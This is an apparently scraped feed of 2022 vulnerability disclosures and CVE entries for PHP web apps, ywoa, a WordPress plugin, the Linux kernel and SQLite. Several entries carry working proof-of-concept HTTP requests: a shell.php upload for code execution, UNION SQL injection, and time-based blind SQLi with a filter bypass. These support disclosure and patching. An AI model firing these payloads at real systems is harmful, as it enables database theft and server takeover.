Garage Management System v1.0 is vulnerable to Arbitrary code execution via ip/garage/php_action/editProductImage.php?id=1.

Permalink

Cannot retrieve contributors at this time

**Garage Management System v1.0 by Alex has arbitrary code execution (RCE)**

BUG\_Author: Yc liu

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Login account: xxx@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/garage/php\_action/editProductImage.php?id=1

Loophole location: arbitrary file upload exists in Garage Management System's editProductImag.php file (RCE).

Request package for file upload：

POST /garage/php\_action/editProductImage.php?id\=1 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/garage/editproduct.php?id=1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------2213179266536
Content-Length: 432
\-----------------------------2213179266536
Content-Disposition: form-data; name="old\_image"
shell.php
\-----------------------------2213179266536
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------2213179266536
Content-Disposition: form-data; name="btn"
\-----------------------------2213179266536--

The files will be uploaded to this directory \\garage\\assets\\myimages

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-38877: bug_report/RCE-1.md at main · MagicWHat/bug_report

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/event/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: 0xdawn & Yc liu

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/event/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/event/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/event/index.php?view=edit&id=-201800036%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /activity/admin/modules/event/index.php?view\=edit&id\=\-201800036%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38878: bug_report/SQLi-1.md at main · MagicWHat/bug_report

TestLink v1.9.20 was discovered to contain a SQL injection vulnerability via /lib/execute/execNavigator.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Changelog
    
*   *   By Size
    *   Enterprise
    *   Teams
    *   Compare all
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-35193: GitHub - HuangYuHsiangPhone/CVEs

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/department/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/department/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/department/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/department/index.php?view=edit&id=-3%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /activity/admin/modules/department/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38832: bug_report/SQLi-1.md at main · saluteSUC/bug_report

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/modstudent/index.php?view=view&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=view&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=view&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=view&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=view&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38833: bug_report/SQLi-2.md at main · saluteSUC/bug_report

ywoa v6.1 is vulnerable to SQL Injection via backend/oa/visual/exportExcel.do interface.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**idea**

Download: http://partner.yimihome.com/static/index.html#/index/idea\_deploy First set it up as shown here, after setting it up, import the database, after importing, you need to change the link configuration yimioa/c-core/src/main/ resources/application.properties Modify the mysql connection information, and then just start  But idea start, more bugs, and report more errors, here is idea static look at the code

**/oa/visual/exportExcel.do interface orderby injection Bypass****Vulnerability recurrence**

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

**bypass** poc

%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Code audit and function implementation**

Did not find the corresponding web function point, here is a direct look at the static code interface audit  
  
orderby, here the parameters, and then look down, because the above personnel function point that GET injection already know getModuleListSqlAndUrlStr method, so look down, directly orderby passed in  
So it causes SQL injection, if not bypass, there will be no problem, after all, the filter method has been bypassed.

CVE-2022-38808: SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface · Issue #26 · cloudwebsoft/ywoa

There exists a use-after-free in io_uring in the Linux kernel. Signalfd_poll() and binder_poll() use a waitqueue whose lifetime is the current task. It will send a POLLFREE notification to all waiters before the queue is freed. Unfortunately, the io_uring poll doesn't handle POLLFREE. This allows a use-after-free to occur if a signalfd or binder fd is polled with io_uring poll, and the waitqueue gets freed. We recommend upgrading past commit fc78b2fc21f10c4c9c4d5d659a685710ffa63659

CVE-2022-3176: 🐧🕺

Ubuntu Security Notice 5615-1 - It was discovered that SQLite incorrectly handled INTERSEC query processing. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that SQLite incorrectly handled ALTER TABLE for views that have a nested FROM clause. An attacker could use this issue to cause SQLite to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue was only addressed in Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-5615-1September 15, 2022sqlite3 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in SQLite.Software Description:- sqlite3: C library that implements an SQL database engineDetails:It was discovered that SQLite incorrectly handled INTERSEC queryprocessing. An attacker could use this issue to cause SQLite to crash,resulting in a denial of service, or possibly execute arbitrary code.(CVE-2020-35525)It was discovered that SQLite incorrectly handled ALTER TABLE for viewsthat have a nested FROM clause.  An attacker could use this issue to causeSQLite to crash, resulting in a denial of service, or possibly executearbitrary code. This issue was only addressed in Ubuntu 20.04 LTS.(CVE-2020-35527)It was discovered that SQLite incorrectly handled embedded null characterswhen tokenizing certain unicode strings. This issue could result inincorrect results. This issue only affected Ubuntu 20.04 LTS.(CVE-2021-20223)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  sqlite3                         3.31.1-4ubuntu0.4Ubuntu 18.04 LTS:  sqlite3                         3.22.0-1ubuntu0.6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5615-1  CVE-2020-35525, CVE-2020-35527, CVE-2021-20223Package Information:  https://launchpad.net/ubuntu/+source/sqlite3/3.31.1-4ubuntu0.4  https://launchpad.net/ubuntu/+source/sqlite3/3.22.0-1ubuntu0.6

Ubuntu Security Notice USN-5615-1

Social Share Buttons version 2.2.3 suffers from a remote SQL injection vulnerability.

    ## Title: Social Share Buttons-2.2.3 SQLi## Author: nu11secur1ty## Date: 09.16.2022## Vendor: https://wordpress.org/## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3## Description:The `project_id` parameter from the Social Share Buttons-2.2.3 systemappears to be vulnerable to SQL injection attacks.The malicious user can dump-steal the database, from this system andhe can use it for very malicious purposes.WARNING: The attacker can retrieve all-database from this system!NOTE: The users of this system are NOT protected, this SQLvulnerability is CRITICAL!STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=social-sharing-share&project_id=378116348' or'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=social-sharing-share&project_id=378116348' or'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND'KWbC'='KWbC&network_id=5&post_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)## Proof and Exploit:[href](https://streamable.com/m9r76w)

Social Share Button 2.2.3 SQL Injection

Rocket LMS version 1.6 suffers from a remote SQL injection vulnerability.

Tag

#sql